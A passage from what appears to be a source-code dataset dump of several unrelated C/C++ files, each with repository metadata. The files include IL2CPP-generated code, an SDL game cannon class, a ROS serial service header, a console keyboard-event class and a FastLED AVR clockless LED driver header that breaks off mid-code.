(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_76 = L_75; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_77 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____2C840AFA48C27B9C05593E468C1232CA1CC74AFD_16_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_76, L_77, /*hidden argument*/NULL); ArrayElementTypeCheck (L_74, L_76); (L_74)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)18)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_76); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_78 = L_74; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_79 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)SZArrayNew(DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E_il2cpp_TypeInfo_var, (uint32_t)((int32_t)18)); DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_80 = L_79; RuntimeFieldHandle_t844BDF00E8E6FE69D9AEAA7657F09018B864F4EF L_81 = { reinterpret_cast<intptr_t> (U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A____B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99_FieldInfo_var) }; RuntimeHelpers_InitializeArray_m29F50CDFEEE0AB868200291366253DD4737BC76A((RuntimeArray *)(RuntimeArray *)L_80, L_81, /*hidden argument*/NULL); ArrayElementTypeCheck (L_78, L_80); (L_78)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(((int32_t)19)), (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)L_80); ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->set_dateParsingStates_1(L_78); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif
1deea669d1614ca988c48c693a1b6436dffc88ff
f9c20c427c37868496cf5bb42aa59a7983ab0e43
/cannon.h
03b0de70a8987e18bd7553e644aca220f6cb0325
[]
no_license
huangkaiyi1/Pacgitis
836402e9b7c3a1275e56b89d41c62b78c9986487
7022309f6bd055609d0b96ac7faa1ea8aecc9d23
refs/heads/master
2021-01-01T16:20:28.596071
2015-08-06T02:59:16
2015-08-06T02:59:16
40,281,212
0
0
null
null
null
null
UTF-8
C++
false
false
1,701
h
class Cannon { public: const int CANNON_DIMEN; int yVel, numStatics; SDL_Rect thisRect; Cannonball upLeft, upRight, lowLeft, lowRight; Cannon(int xCoord, int yCoord, int statics ): CANNON_DIMEN(40), upLeft( thisRect.x, thisRect.y, -enemySpeed *2, -enemySpeed *2 ), upRight( thisRect.x + CANNON_DIMEN, thisRect.y, enemySpeed *2, -enemySpeed *2 ), lowLeft( thisRect.x, thisRect.y + CANNON_DIMEN, -enemySpeed *2, enemySpeed *2 ), lowRight( thisRect.x + CANNON_DIMEN, thisRect.y + CANNON_DIMEN, enemySpeed *2, enemySpeed *2 ) { numStatics = statics; yVel = enemySpeed; initRect( &thisRect, xCoord, yCoord, CANNON_DIMEN, CANNON_DIMEN ); } void shoot() { if( upLeft.isExploded() ){ upLeft.posUpdate( thisRect.x, thisRect.y ); } else{ upLeft.fire(); } if( upRight.isExploded() ){ upRight.posUpdate( thisRect.x + CANNON_DIMEN, thisRect.y ); } else{ upRight.fire(); } if( lowLeft.isExploded() ){ lowLeft.posUpdate( thisRect.x, thisRect.y + CANNON_DIMEN ); } else{ lowLeft.fire(); } if( lowRight.isExploded() ){ lowRight.posUpdate( thisRect.x + CANNON_DIMEN, thisRect.y + CANNON_DIMEN ); } else{ lowRight.fire(); } } bool collision() { for ( int i = 0; i < numStatics; i++ ) { if ( check_collision( &curArrayOfRects[i], &thisRect ) ){return true;} } } void moveShoot() { if( (thisRect.y <= 0) || (thisRect.y + CANNON_DIMEN >= SCREEN_HEIGHT) || collision() ) { yVel *= -1; } if ( enemySpeed != 0 ){ thisRect.y += yVel; } display(); shoot(); } void display() { apply_surface( thisRect.x, thisRect.y, cannonPic, screen ); } };
d5d0568cd72545d75ad669cc87c229b2e02fd995
51ec1f4e2244dbebfcb75e1406080f38ff40fa78
/libraries/ros_lib/tutorial_service/srv_tutorial.h
2d7bfa42b530a1356db11d99dcaf541e9183e1ee
[]
no_license
youngjoo-ko/arduino
897ef43bbae5519517a09d91948f9d57694620dc
6eec78e05cd412bd72431a2c116069a0146a2472
refs/heads/master
2023-03-21T17:59:37.127000
2021-03-08T14:08:22
2021-03-08T14:08:22
330,826,819
0
0
null
null
null
null
UTF-8
C++
false
false
5,796
h
#ifndef _ROS_SERVICE_srv_tutorial_h #define _ROS_SERVICE_srv_tutorial_h #include <stdint.h> #include <string.h> #include <stdlib.h> #include "ros/msg.h" namespace tutorial_service { static const char SRV_TUTORIAL[] = "tutorial_service/srv_tutorial"; class srv_tutorialRequest : public ros::Msg { public: typedef int64_t _a_type; _a_type a; typedef int64_t _b_type; _b_type b; srv_tutorialRequest(): a(0), b(0) { } virtual int serialize(unsigned char *outbuffer) const override { int offset = 0; union { int64_t real; uint64_t base; } u_a; u_a.real = this->a; *(outbuffer + offset + 0) = (u_a.base >> (8 * 0)) & 0xFF; *(outbuffer + offset + 1) = (u_a.base >> (8 * 1)) & 0xFF; *(outbuffer + offset + 2) = (u_a.base >> (8 * 2)) & 0xFF; *(outbuffer + offset + 3) = (u_a.base >> (8 * 3)) & 0xFF; *(outbuffer + offset + 4) = (u_a.base >> (8 * 4)) & 0xFF; *(outbuffer + offset + 5) = (u_a.base >> (8 * 5)) & 0xFF; *(outbuffer + offset + 6) = (u_a.base >> (8 * 6)) & 0xFF; *(outbuffer + offset + 7) = (u_a.base >> (8 * 7)) & 0xFF; offset += sizeof(this->a); union { int64_t real; uint64_t base; } u_b; u_b.real = this->b; *(outbuffer + offset + 0) = (u_b.base >> (8 * 0)) & 0xFF; *(outbuffer + offset + 1) = (u_b.base >> (8 * 1)) & 0xFF; *(outbuffer + offset + 2) = (u_b.base >> (8 * 2)) & 0xFF; *(outbuffer + offset + 3) = (u_b.base >> (8 * 3)) & 0xFF; *(outbuffer + offset + 4) = (u_b.base >> (8 * 4)) & 0xFF; *(outbuffer + offset + 5) = (u_b.base >> (8 * 5)) & 0xFF; *(outbuffer + offset + 6) = (u_b.base >> (8 * 6)) & 0xFF; *(outbuffer + offset + 7) = (u_b.base >> (8 * 7)) & 0xFF; offset += sizeof(this->b); return offset; } virtual int deserialize(unsigned char *inbuffer) override { int offset = 0; union { int64_t real; uint64_t base; } u_a; u_a.base = 0; u_a.base |= ((uint64_t) (*(inbuffer + offset + 0))) << (8 * 0); u_a.base |= ((uint64_t) (*(inbuffer + offset + 1))) << (8 * 1); u_a.base |= ((uint64_t) (*(inbuffer + offset + 2))) << (8 * 2); u_a.base |= ((uint64_t) (*(inbuffer + offset + 3))) << (8 * 3); u_a.base |= ((uint64_t) (*(inbuffer + offset + 4))) << (8 * 4); u_a.base |= ((uint64_t) (*(inbuffer + offset + 5))) << (8 * 5); u_a.base |= ((uint64_t) (*(inbuffer + offset + 6))) << (8 * 6); u_a.base |= ((uint64_t) (*(inbuffer + offset + 7))) << (8 * 7); this->a = u_a.real; offset += sizeof(this->a); union { int64_t real; uint64_t base; } u_b; u_b.base = 0; u_b.base |= ((uint64_t) (*(inbuffer + offset + 0))) << (8 * 0); u_b.base |= ((uint64_t) (*(inbuffer + offset + 1))) << (8 * 1); u_b.base |= ((uint64_t) (*(inbuffer + offset + 2))) << (8 * 2); u_b.base |= ((uint64_t) (*(inbuffer + offset + 3))) << (8 * 3); u_b.base |= ((uint64_t) (*(inbuffer + offset + 4))) << (8 * 4); u_b.base |= ((uint64_t) (*(inbuffer + offset + 5))) << (8 * 5); u_b.base |= ((uint64_t) (*(inbuffer + offset + 6))) << (8 * 6); u_b.base |= ((uint64_t) (*(inbuffer + offset + 7))) << (8 * 7); this->b = u_b.real; offset += sizeof(this->b); return offset; } virtual const char * getType() override { return SRV_TUTORIAL; }; virtual const char * getMD5() override { return "36d09b846be0b371c5f190354dd3153e"; }; }; class srv_tutorialResponse : public ros::Msg { public: typedef int64_t _result_type; _result_type result; srv_tutorialResponse(): result(0) { } virtual int serialize(unsigned char *outbuffer) const override { int offset = 0; union { int64_t real; uint64_t base; } u_result; u_result.real = this->result; *(outbuffer + offset + 0) = (u_result.base >> (8 * 0)) & 0xFF; *(outbuffer + offset + 1) = (u_result.base >> (8 * 1)) & 0xFF; *(outbuffer + offset + 2) = (u_result.base >> (8 * 2)) & 0xFF; *(outbuffer + offset + 3) = (u_result.base >> (8 * 3)) & 0xFF; *(outbuffer + offset + 4) = (u_result.base >> (8 * 4)) & 0xFF; *(outbuffer + offset + 5) = (u_result.base >> (8 * 5)) & 0xFF; *(outbuffer + offset + 6) = (u_result.base >> (8 * 6)) & 0xFF; *(outbuffer + offset + 7) = (u_result.base >> (8 * 7)) & 0xFF; offset += sizeof(this->result); return offset; } virtual int deserialize(unsigned char *inbuffer) override { int offset = 0; union { int64_t real; uint64_t base; } u_result; u_result.base = 0; u_result.base |= ((uint64_t) (*(inbuffer + offset + 0))) << (8 * 0); u_result.base |= ((uint64_t) (*(inbuffer + offset + 1))) << (8 * 1); u_result.base |= ((uint64_t) (*(inbuffer + offset + 2))) << (8 * 2); u_result.base |= ((uint64_t) (*(inbuffer + offset + 3))) << (8 * 3); u_result.base |= ((uint64_t) (*(inbuffer + offset + 4))) << (8 * 4); u_result.base |= ((uint64_t) (*(inbuffer + offset + 5))) << (8 * 5); u_result.base |= ((uint64_t) (*(inbuffer + offset + 6))) << (8 * 6); u_result.base |= ((uint64_t) (*(inbuffer + offset + 7))) << (8 * 7); this->result = u_result.real; offset += sizeof(this->result); return offset; } virtual const char * getType() override { return SRV_TUTORIAL; }; virtual const char * getMD5() override { return "9b05623554ab950ed237d43d45f0b4dd"; }; }; class srv_tutorial { public: typedef srv_tutorialRequest Request; typedef srv_tutorialResponse Response; }; } #endif
158f92a340587ab37b12a21ac3209966aec08b07
79a02f270a4dd183dc1bd459ed046ead029be04b
/SimpleConsole/src/KeyboardEvent.cpp
301d6f457995a561f7ab827dc593ea7fd7c56bda
[]
no_license
PanTomko/SimpleConsole
7cf7cff87c00568950b780508554577e14a8f731
b9e8536c35fd3e3bf8e6966f7586ed8e503151f2
refs/heads/master
2022-03-21T13:11:53.232409
2019-12-25T17:50:17
2019-12-25T17:50:17
230,136,035
1
0
null
null
null
null
UTF-8
C++
false
false
608
cpp
#include "KeyboardEvent.h" using namespace sc; bool KeyboardEvent::isKey(const Key & key) { return this->key == key; } bool KeyboardEvent::isKeyPressed(const Key & key) { return (isKey(key) || key == Key::Null) && static_cast<bool>( keyState & 0b001 ); } bool KeyboardEvent::isKeyJustRelased(const Key & key) { return (isKey(key) || key == Key::Null) && static_cast<bool>(keyState & 0b010); } bool KeyboardEvent::isKeyJustPressed(const Key & key) { return (isKey(key) || key == Key::Null) && static_cast<bool>(keyState & 0b100); } KeyboardEvent::KeyboardEvent(){} KeyboardEvent::~KeyboardEvent(){}
5d630e12ecf3bdd8a71a58f82b9fd5e3f480ea95
6db77e76099546c6b4ae71ff73f1a6b8e9d9c6b7
/clockless_trinket.h
63f037f9261054c21aaf3b9314ab30beeed2ebf3
[ "MIT" ]
permissive
pylb/FermiLights
050bf411b1fec1976b77c6be807d13879b32e368
94c66c4aafed22aa47856b21423299dda1dc2de5
refs/heads/master
2021-03-12T20:27:07.966952
2015-03-07T23:25:35
2015-03-07T23:25:35
31,797,152
0
0
MIT
2018-07-17T10:47:08
2015-03-07T01:37:47
C++
UTF-8
C++
false
false
16,426
h
#ifndef __INC_CLOCKLESS_TRINKET_H #define __INC_CLOCKLESS_TRINKET_H #include "controller.h" #include "lib8tion.h" #include "delay.h" #include <avr/interrupt.h> // for cli/se definitions #if defined(FASTLED_AVR) // Scaling macro choice #ifndef TRINKET_SCALE #define TRINKET_SCALE 1 // whether or not to use dithering #define DITHER 1 #endif // Variations on the functions in delay.h - w/a loop var passed in to preserve registers across calls by the optimizer/compiler template<int CYCLES> inline void _dc(register uint8_t & loopvar); template<int _LOOP, int PAD> inline void _dc_AVR(register uint8_t & loopvar) { _dc<PAD>(loopvar); // The convolution in here is to ensure that the state of the carry flag coming into the delay loop is preserved asm __volatile__ ( "BRCS L_PC%=\n\t" " LDI %[loopvar], %[_LOOP]\n\tL_%=: DEC %[loopvar]\n\t BRNE L_%=\n\tBREQ L_DONE%=\n\t" "L_PC%=: LDI %[loopvar], %[_LOOP]\n\tLL_%=: DEC %[loopvar]\n\t BRNE LL_%=\n\tBSET 0\n\t" "L_DONE%=:\n\t" : [loopvar] "+a" (loopvar) : [_LOOP] "M" (_LOOP) : ); } template<int CYCLES> __attribute__((always_inline)) inline void _dc(register uint8_t & loopvar) { _dc_AVR<CYCLES/6,CYCLES%6>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<-6>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<-5>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<-4>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<-3>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<-2>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<-1>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<0>(register uint8_t & loopvar) {} template<> __attribute__((always_inline)) inline void _dc<1>(register uint8_t & loopvar) {asm __volatile__("mov r0,r0":::);} template<> __attribute__((always_inline)) inline void _dc<2>(register uint8_t & loopvar) {asm __volatile__("rjmp .+0":::);} template<> __attribute__((always_inline)) inline void _dc<3>(register uint8_t & loopvar) { _dc<2>(loopvar); _dc<1>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<4>(register uint8_t & loopvar) { _dc<2>(loopvar); _dc<2>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<5>(register uint8_t & loopvar) { _dc<2>(loopvar); _dc<3>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<6>(register uint8_t & loopvar) { _dc<2>(loopvar); _dc<2>(loopvar); _dc<2>(loopvar);} template<> __attribute__((always_inline)) inline void _dc<7>(register uint8_t & loopvar) { _dc<4>(loopvar); _dc<3>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<8>(register uint8_t & loopvar) { _dc<4>(loopvar); _dc<4>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<9>(register uint8_t & loopvar) { _dc<5>(loopvar); _dc<4>(loopvar); } template<> __attribute__((always_inline)) inline void _dc<10>(register uint8_t & loopvar) { _dc<6>(loopvar); _dc<4>(loopvar); } #define D1(ADJ) _dc<T1-(AVR_PIN_CYCLES(DATA_PIN)+ADJ)>(loopvar); #define D2(ADJ) _dc<T2-(AVR_PIN_CYCLES(DATA_PIN)+ADJ)>(loopvar); #define D3(ADJ) _dc<T3-(AVR_PIN_CYCLES(DATA_PIN)+ADJ)>(loopvar); ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // // Base template for clockless controllers. These controllers have 3 control points in their cycle for each bit. The first point // is where the line is raised hi. The second point is where the line is dropped low for a zero. The third point is where the // line is dropped low for a one. T1, T2, and T3 correspond to the timings for those three in clock cycles. // ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// template <uint8_t DATA_PIN, int T1, int T2, int T3, EOrder RGB_ORDER = RGB, int XTRA0 = 0, bool FLIP = false, int WAIT_TIME = 50> class ClocklessController : public CLEDController { typedef typename FastPin<DATA_PIN>::port_ptr_t data_ptr_t; typedef typename FastPin<DATA_PIN>::port_t data_t; CMinWait<WAIT_TIME> mWait; public: virtual void init() { FastPin<DATA_PIN>::setOutput(); } virtual void clearLeds(int nLeds) { CRGB zeros(0,0,0); showAdjTime((uint8_t*)&zeros, nLeds, zeros, false, 0); } protected: // set all the leds on the controller to a given color virtual void showColor(const struct CRGB & rgbdata, int nLeds, CRGB scale) { showAdjTime((uint8_t*)&rgbdata, nLeds, scale, false, 0); } virtual void show(const struct CRGB *rgbdata, int nLeds, CRGB scale) { showAdjTime((uint8_t*)rgbdata, nLeds, scale, true, 0); } #ifdef SUPPORT_ARGB virtual void show(const struct CARGB *rgbdata, int nLeds, CRGB scale) { showAdjTime((uint8_t*)rgbdata, nLeds, scale, true, 1); } #endif void showAdjTime(const uint8_t *data, int nLeds, CRGB & scale, bool advance, int skip) { PixelController<RGB_ORDER> pixels(data, nLeds, scale, getDither(), advance, skip); mWait.wait(); cli(); showRGBInternal(pixels); // Adjust the timer #if !defined(NO_CORRECTION) || (NO_CORRECTION == 0) uint32_t microsTaken = (uint32_t)nLeds * (uint32_t)CLKS_TO_MICROS(24 * (T1 + T2 + T3)); if(microsTaken > 1024) { MS_COUNTER += (microsTaken >> 10); } else { MS_COUNTER++; } #endif sei(); mWait.mark(); } #define USE_ASM_MACROS // The variables that our various asm statemetns use. The same block of variables needs to be declared for // all the asm blocks because GCC is pretty stupid and it would clobber variables happily or optimize code away too aggressively #define ASM_VARS : /* write variables */ \ [count] "+x" (count), \ [data] "+z" (data), \ [b0] "+a" (b0), \ [b1] "+a" (b1), \ [b2] "+a" (b2), \ [scale_base] "+a" (scale_base), \ [loopvar] "+a" (loopvar), \ [d0] "+r" (d0), \ [d1] "+r" (d1), \ [d2] "+r" (d2) \ : /* use variables */ \ [ADV] "r" (advanceBy), \ [hi] "r" (hi), \ [lo] "r" (lo), \ [s0] "r" (s0), \ [s1] "r" (s1), \ [s2] "r" (s2), \ [PORT] "M" (FastPin<DATA_PIN>::port()-0x20), \ [O0] "M" (RGB_BYTE0(RGB_ORDER)), \ [O1] "M" (RGB_BYTE1(RGB_ORDER)), \ [O2] "M" (RGB_BYTE2(RGB_ORDER)) \ : /* clobber registers */ // 1 cycle, write hi to the port #define HI1 if((int)(FastPin<DATA_PIN>::port())-0x20 < 64) { asm __volatile__("out %[PORT], %[hi]" ASM_VARS ); } else { *FastPin<DATA_PIN>::port()=hi; } // 1 cycle, write lo to the port #define LO1 if((int)(FastPin<DATA_PIN>::port())-0x20 < 64) { asm __volatile__("out %[PORT], %[lo]" ASM_VARS ); } else { *FastPin<DATA_PIN>::port()=lo; } // 2 cycles, sbrs on flipping the lne to lo if we're pushing out a 0 #define QLO2(B, N) asm __volatile__("sbrs %[" #B "], " #N ASM_VARS ); LO1; // load a byte from ram into the given var with the given offset #define LD2(B,O) asm __volatile__("ldd %[" #B "], Z + %[" #O "]" ASM_VARS ); // 4 cycles - load a byte from ram into the scaling scratch space with the given offset, clear the target var, clear carry #define LDSCL4(B,O) asm __volatile__("ldd %[scale_base], Z + %[" #O "]\n\tclr %[" #B "]\n\tclc" ASM_VARS ); // 2 cycles - perform one step of the scaling (if a given bit is set in scale, add scale-base to the scratch space) #define SCALE02(B, N) asm __volatile__("sbrc %[s0], " #N "\n\tadd %[" #B "], %[scale_base]" ASM_VARS ); #define SCALE12(B, N) asm __volatile__("sbrc %[s1], " #N "\n\tadd %[" #B "], %[scale_base]" ASM_VARS ); #define SCALE22(B, N) asm __volatile__("sbrc %[s2], " #N "\n\tadd %[" #B "], %[scale_base]" ASM_VARS ); // apply dithering value before we do anything with scale_base #define PRESCALE4(D) if(DITHER) { asm __volatile__("cpse %[scale_base], __zero_reg__\n\t add %[scale_base],%[" #D "]\n\tbrcc L_%=\n\tldi %[scale_base], 0xFF\n\tL_%=:\n\t" ASM_VARS); } \ else { _dc<4>(loopvar); } // Do the add for the prescale #define PRESCALEA2(D) if(DITHER) { asm __volatile__("cpse %[scale_base], __zero_reg__\n\t add %[scale_base],%[" #D "]\n\t" ASM_VARS); } \ else { _dc<2>(loopvar); } // Do the clamp for the prescale, clear carry when we're done - NOTE: Must ensure carry flag state is preserved! #define PRESCALEB3(D) if(DITHER) { asm __volatile__("brcc L_%=\n\tldi %[scale_base], 0xFF\n\tL_%=:\n\tCLC" ASM_VARS); } \ else { _dc<3>(loopvar); } // 1 cycle - rotate right, pulling in from carry #define ROR1(B) asm __volatile__("ror %[" #B "]" ASM_VARS ); // 1 cycle, clear the carry bit #define CLC1 asm __volatile__("clc" ASM_VARS ); // 1 cycle, move one register to another #define MOV1(B1, B2) asm __volatile__("mov %[" #B1 "], %[" #B2 "]" ASM_VARS ); // 4 cycles, rotate, clear carry, scale next bit #define RORSC04(B, N) ROR1(B) CLC1 SCALE02(B, N) #define RORSC14(B, N) ROR1(B) CLC1 SCALE12(B, N) #define RORSC24(B, N) ROR1(B) CLC1 SCALE22(B, N) // 4 cycles, scale bit, rotate, clear carry #define SCROR04(B, N) SCALE02(B,N) ROR1(B) CLC1 #define SCROR14(B, N) SCALE12(B,N) ROR1(B) CLC1 #define SCROR24(B, N) SCALE22(B,N) ROR1(B) CLC1 ///////////////////////////////////////////////////////////////////////////////////// // Loop life cycle // dither adjustment macro - should be kept in sync w/what's in stepDithering #define ADJDITHER2(D, E) D = E - D; // #define xstr(a) str(a) // #define str(a) #a // #define ADJDITHER2(D,E) asm __volatile__("subi %[" #D "], " xstr(DUSE) "\n\tand %[" #D "], %[" #E "]\n\t" ASM_VARS); // define the beginning of the loop #define LOOP asm __volatile__("1:" ASM_VARS ); // define the end of the loop #define DONE asm __volatile__("2:" ASM_VARS ); // 2 cycles - increment the data pointer #define IDATA2 asm __volatile__("add %A[data], %[ADV]\n\tadc %B[data], __zero_reg__" ASM_VARS ); // 2 cycles - decrement the counter #define DCOUNT2 asm __volatile__("sbiw %[count], 1" ASM_VARS ); // 2 cycles - jump to the beginning of the loop #define JMPLOOP2 asm __volatile__("rjmp 1b" ASM_VARS ); // 2 cycles - jump out of the loop #define BRLOOP1 asm __volatile__("breq 2f" ASM_VARS ); #define DADVANCE 3 #define DUSE (0xFF - (DADVANCE-1)) // This method is made static to force making register Y available to use for data on AVR - if the method is non-static, then // gcc will use register Y for the this pointer. static void __attribute__ ((always_inline)) showRGBInternal(PixelController<RGB_ORDER> & pixels) { uint8_t *data = (uint8_t*)pixels.mData; data_ptr_t port = FastPin<DATA_PIN>::port(); data_t mask = FastPin<DATA_PIN>::mask(); uint8_t scale_base = 0; // register uint8_t *end = data + nLeds; data_t hi = *port | mask; data_t lo = *port & ~mask; *port = lo; uint8_t b0 = 0; uint8_t b1 = 0; uint8_t b2 = 0; // Setup the pixel controller and load/scale the first byte pixels.preStepFirstByteDithering(); b0 = pixels.loadAndScale0(); // pull the dithering/adjustment values out of the pixels object for direct asm access uint8_t advanceBy = pixels.advanceBy(); uint16_t count = pixels.mLen; uint8_t s0 = pixels.mScale.raw[RO(0)]; uint8_t s1 = pixels.mScale.raw[RO(1)]; uint8_t s2 = pixels.mScale.raw[RO(2)]; uint8_t d0 = pixels.d[RO(0)]; uint8_t d1 = pixels.d[RO(1)]; uint8_t d2 = pixels.d[RO(2)]; uint8_t e0 = pixels.e[RO(0)]; uint8_t e1 = pixels.e[RO(1)]; uint8_t e2 = pixels.e[RO(2)]; uint8_t loopvar=0; { while(count--) { // Loop beginning, does some stuff that's outside of the pixel write cycle, namely incrementing d0-2 and masking off // by the E values (see the definition ) // LOOP; ADJDITHER2(d0,e0); ADJDITHER2(d1,e1); ADJDITHER2(d2,e2); hi = *port | mask; lo = *port & ~mask; // Sum of the clock counts across each row should be 10 for 8Mhz, WS2811 // The values in the D1/D2/D3 indicate how many cycles the previous column takes // to allow things to line back up. // // While writing out byte 0, we're loading up byte 1, applying the dithering adjustment, // then scaling it using 8 cycles of shift/add interleaved in between writing the bits // out. When doing byte 1, we're doing the above for byte 2. When we're doing byte 2, // we're cycling back around and doing the above for byte 0. #if TRINKET_SCALE // Inline scaling - RGB ordering HI1 D1(1) QLO2(b0, 7) LDSCL4(b1,O1) D2(4) LO1 PRESCALEA2(d1) D3(2) HI1 D1(1) QLO2(b0, 6) PRESCALEB3(d1) D2(3) LO1 SCALE12(b1,0) D3(2) HI1 D1(1) QLO2(b0, 5) RORSC14(b1,1) D2(4) LO1 ROR1(b1) CLC1 D3(2) HI1 D1(1) QLO2(b0, 4) SCROR14(b1,2) D2(4) LO1 SCALE12(b1,3) D3(2) HI1 D1(1) QLO2(b0, 3) RORSC14(b1,4) D2(4) LO1 ROR1(b1) CLC1 D3(2) HI1 D1(1) QLO2(b0, 2) SCROR14(b1,5) D2(4) LO1 SCALE12(b1,6) D3(2) HI1 D1(1) QLO2(b0, 1) RORSC14(b1,7) D2(4) LO1 ROR1(b1) CLC1 D3(2) HI1 D1(1) QLO2(b0, 0) D2(0) LO1 D3(0) switch(XTRA0) { case 4: HI1 D1(1) QLO2(b0,0) D2(0) LO1 D3(0); case 3: HI1 D1(1) QLO2(b0,0) D2(0) LO1 D3(0); case 2: HI1 D1(1) QLO2(b0,0) D2(0) LO1 D3(0); case 1: HI1 D1(1) QLO2(b0,0) D2(0) LO1 D3(0); } HI1 D1(1) QLO2(b1, 7) LDSCL4(b2,O2) D2(4) LO1 PRESCALEA2(d2) D3(2) HI1 D1(1) QLO2(b1, 6) PRESCALEB3(d2) D2(3) LO1 SCALE22(b2,0) D3(2) HI1 D1(1) QLO2(b1, 5) RORSC24(b2,1) D2(4) LO1 ROR1(b2) CLC1 D3(2) HI1 D1(1) QLO2(b1, 4) SCROR24(b2,2) D2(4) LO1 SCALE22(b2,3) D3(2) HI1 D1(1) QLO2(b1, 3) RORSC24(b2,4) D2(4) LO1 ROR1(b2) CLC1 D3(2) HI1 D1(1) QLO2(b1, 2) SCROR24(b2,5) D2(4) LO1 SCALE22(b2,6) D3(2) HI1 D1(1) QLO2(b1, 1) RORSC24(b2,7) D2(4) LO1 ROR1(b2) CLC1 D3(2) HI1 D1(1) QLO2(b1, 0) IDATA2 CLC1 D2(3) LO1 D3(0) switch(XTRA0) { case 4: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 3: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 2: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 1: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); } HI1 D1(1) QLO2(b2, 7) LDSCL4(b0,O0) D2(4) LO1 PRESCALEA2(d0) D3(2) HI1 D1(1) QLO2(b2, 6) PRESCALEB3(d0) D2(3) LO1 SCALE02(b0,0) D3(2) HI1 D1(1) QLO2(b2, 5) RORSC04(b0,1) D2(4) LO1 ROR1(b0) CLC1 D3(2) HI1 D1(1) QLO2(b2, 4) SCROR04(b0,2) D2(4) LO1 SCALE02(b0,3) D3(2) HI1 D1(1) QLO2(b2, 3) RORSC04(b0,4) D2(4) LO1 ROR1(b0) CLC1 D3(2) HI1 D1(1) QLO2(b2, 2) SCROR04(b0,5) D2(4) LO1 SCALE02(b0,6) D3(2) HI1 D1(1) QLO2(b2, 1) RORSC04(b0,7) D2(4) LO1 ROR1(b0) CLC1 D3(2) // HI1 D1(1) QLO2(b2, 0) DCOUNT2 BRLOOP1 D2(3) LO1 D3(2) JMPLOOP2 HI1 D1(1) QLO2(b2, 0) D2(0) LO1 D3(0) switch(XTRA0) { case 4: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 3: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 2: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); case 1: HI1 D1(1) QLO2(b1,0) D2(0) LO1 D3(0); } #else // no inline scaling - non-straight RGB ordering HI1 D1(1) QLO2(b0, 7) LD2(b1,O1) D2(2) LO1 D3(0) HI1 D1(1) QLO2(b0, 6) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 5) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 4) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 3) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 2) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 1) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b0, 0) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 7) LD2(b2,O2) D2(2) LO1 D3(0) HI1 D1(1) QLO2(b1, 6) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 5) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 4) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 3) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 2) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 1) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b1, 0) IDATA2 D2(2) LO1 D3(0) HI1 D1(1) QLO2(b2, 7) LD2(b0,O0) D2(2) LO1 D3(0) HI1 D1(1) QLO2(b2, 6) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b2, 5) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b2, 4) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b2, 3) D2(0) LO1 D3(0) HI1 D1(1) QLO2(b2, 2) D2(0) LO1 D3(0) HI1 D1(1) 